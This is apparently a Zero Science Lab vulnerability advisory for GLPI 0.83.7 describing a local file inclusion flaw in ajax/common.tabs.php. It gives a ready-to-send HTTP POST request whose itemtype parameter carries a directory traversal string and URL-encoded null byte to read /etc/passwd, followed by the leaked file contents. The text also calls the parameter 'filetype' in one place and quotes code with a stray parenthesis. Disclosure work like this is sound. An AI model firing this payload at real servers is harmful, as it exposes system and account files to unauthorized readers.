GLPI 0.83.7 Parameter Traversal Arbitrary File Access

`  
GLPI v0.83.7 (itemtype) Parameter Traversal Arbitrary File Access Exploit  
  
  
Vendor: INDEPNET Development Team  
Product web page: http://www.glpi-project.org  
Affected version: 0.83.7  
  
Summary: GLPI, an initialism for Gestionnaire libre de parc informatique  
(Free Management of Computer Equipment), was designed by Indepnet  
Association (a non profit organisation) in 2003. GLPI is a free  
asset and IT management software package, it also offers functionalities  
like servicedesk ITIL or license tracking and software auditing.  
  
Desc: GLPI suffers from a file inclusion vulnerability (LFI) when input  
passed thru the 'filetype' parameter to 'common.tabs.php' script is not  
properly verified before being used to include files. This can be exploited  
to include files from local resources with directory traversal attacks  
and URL encoded NULL bytes.  
  
========================================================================  
/ajax/common.tabs.php:  
----------------------  
  
46: if (!isset($_REQUEST['itemtype']) || empty($_REQUEST['itemtype'])) {  
47: exit();  
62: $item = new $_REQUEST['itemtype'])();  
  
========================================================================  
  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7  
Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3  
  
  
  
Vulnerabilities discovered by Humberto Cabrera  
@dniz0r  
Zero Science Lab - http://www.zeroscience.mk  
  
  
Advisory ID: ZSL-2013-5145  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php  
  
  
09.05.2013  
  
---  
  
  
POST /glpi/ajax/common.tabs.php?_dc=1371234969991 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://localhost/glpi/front/user.form.php?id=2  
Content-Length: 75  
Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
target=/glpi/front/user.form.php&itemtype=../../../../../../../../../../../../../../../../etc/passwd%00User&glpi_tab=Profile_User$1&id=2  
  
---  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
..  
..  
  
`